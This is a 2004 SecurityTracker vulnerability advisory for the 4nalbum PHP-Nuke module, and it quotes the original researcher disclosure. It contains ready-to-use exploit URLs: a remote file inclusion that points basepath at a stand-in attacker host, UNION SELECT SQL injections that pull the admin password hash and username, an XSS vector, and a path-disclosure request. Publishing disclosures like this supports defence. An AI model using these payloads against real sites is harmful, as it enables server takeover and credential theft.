Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
4nalbum Module Input Validation Flaws Let Remote Users Execute Arbitrary Commands, Inject SQL Queries, and Conduct Cross-Site Scripting Attacks
|
|
SecurityTracker Alert ID: 1009449
|
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Mar 16 2004
|
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
|
Exploit Included: Yes
|
Version(s): 0.92
|
Description: Some input validation vulnerabilities were reported in the 4nalbum add-on module for PHP-Nuke. A remote user can cause arbitrary
PHP code and operating system commands to be executed on the target system. A remote user can also conduct SQL injection and cross-site
scripting attacks.
Janek Vind (waraxe) reported that the 'displaycategory.php' script does not properly validate user-supplied values for the 'basepath'
variable. A remote user can supply a specially crafted URL to cause the target system to include PHP code ('fileFunctions.php')
located on a remote server and execute the code. A demonstration exploit URL is provided:
http://[target]/nuke71/modules/4nalbum/public/displaycategory.php?basepath=h
ttp://[attacker]
This exploit will not work if the 'allow_url_fopen' setting in 'php.ini' is set to 'off', the report said.
It
is also reported that the 'nmimage.php' script does not filter HTML code from user-supplied input in the 'z' variable. A remote
user can create a specially crafted request that, when loaded by a target user, will cause arbitrary scripting code to be executed
by the target user's browser. The code will originate from the site running the 4nalbum software and will run in the security context
of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any,
associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site
acting as the target user. A demonstration exploit URL is provided:
http://[target]/nuke71/modules/4nalbum/public/nmimage.php?z=[xss
code here]
Because PHP-Nuke filters some GET request characters, a POST request is required to exploit this flaw, the report
said.
It is also reported that a remote user can inject specially crafted text in the 'gid' parameter to execute SQL commands
on the target system. Some demonstration exploit URLs are provided:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION
%20SELECT%20null,null,pwd,2,null,null,null
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-99%20UNION%20SELECT%20null,null,aid,
2,null,null,null
A remote user can, for example, obtain hashed passwords from the database.
It is also reported that a remote
user can invoke the following type of URL to view the installation path:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php
|
Impact: A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the web service.
A
remote user can also inject SQL commands to run queries on the underlying database.
A remote user can determine the installation
path.
A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site
running the 4nalbum software, access data recently submitted by the target user via web form to the site, or take actions on the
site acting as the target user.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.warp-speed.de/ (Links to External Site)
|
Cause: Access control error, Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: Janek Vind <come2waraxe@yahoo.com>
|
Message History:
None.
|
Source Message Contents
|
Date: 15 Mar 2004 18:40:52 -0000
From: Janek Vind <come2waraxe@yahoo.com>
Subject: [waraxe-2004-SA#006 - Multiple vulnerabilities in 4nalbum module
|
{================================================================================}
{ [waraxe-2004-SA#006] }
{================================================================================}
{ }
{ [ Multiple vulnerabilities in 4nalbum module for PhpNuke ] }
{ }
{================================================================================}
Author: Janek Vind "waraxe"
Date: 15. March 2004
Location: Estonia, Tartu
Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From developer's infofile:
4nAlbum Version 0.92 (German & English) for phpNUKE Version 6.5 - 7.0 (http://phpnuke.org)
By WarpSpeed (Marco Wiesler) (warpspeed@4thDimension.de) @ Nov/2oo3 http://www.warp-speed.de
@ 4thDimension.de Networking
With this addon/module for phpNUKE you can offer a comfortable
(Media) Album to your users.
- Creating infinite categories and subcategories
- Comfortable Administrationsfunction with helptexts
- Upload from Mediafiles for Members/Guests possible (can be deactivated)
- etc
Vulnerabilities:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Full path disclosure:
If we use URL-s below, then we can see standard php error messages with full path disclosure.
This is frequently underestimated security flaw, which can give for potential attacker vital
information, needed to hack further. For example, if we can exploit some sql injection bugs and
logged-in MySql user has file permissions, then the exact full path to the file is needed to successf
ul
file creation or reading.
Examples:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php
2. Remote file inclusion:
Remote attacker can make GET or POST request with specially crafted parameter and victim server
will include the file from remote server, therefore attacker can make victim server parse any php cod
e,
whatever attacker wants. Of course - if webserver is located behind properly configured firewall, or
if
php.ini configuration contains "allow_url_fopen = Off", then it does'nt work...
Examples:
First upload file named "fileFunctions.php" to te www.attacker.com. Then make request:
http://localhost/nuke71/modules/4nalbum/public/displaycategory.php?basepath=http://www.attacker.com/
This is the original code from displaycategory.php:
...
include ("$basepath/public/imageFunctions.php");
include ("$adminpath/fileFunctions.php");
function getThumbnail($img, $galloc) {
global
...
3. Cross-Site scripting aka XSS
XSS is useful for stealing of the cookies, which will lead to bypassing of the authentication and
overtaking of the website (if attacker can get admin-s cookies).
Example:
http://localhost/nuke71/modules/4nalbum/public/nmimage.php?z=[xss code here]
Because PhpNuke will filter some important symbols from GET request, POST request is needed.
4. sql injection
This is my favourite ;) - easy to exploit and the effect is devastating.
Try this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gi
d=-99%20UNION%20SELECT%20null,null,pwd,2,null,null,null%20FROM%20nuke_authors/*
and this:
http://localhost/nuke71/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gi
d=-99%20UNION%20SELECT%20null,null,aid,2,null,null,null%20FROM%20nuke_authors/*
and you will see admin's password md5 hash and username. This is enough to handcraft the cookie and b
ypass authentication ;)
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ulljobu, djzone, raider and to all IT freaks in Estonia!
Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
come2waraxe@yahoo.com
Janek Vind "waraxe"
---------------------------------- [ EOF ] ------------------------------------
|
|
Go to the Top of This SecurityTracker Archive Page
|
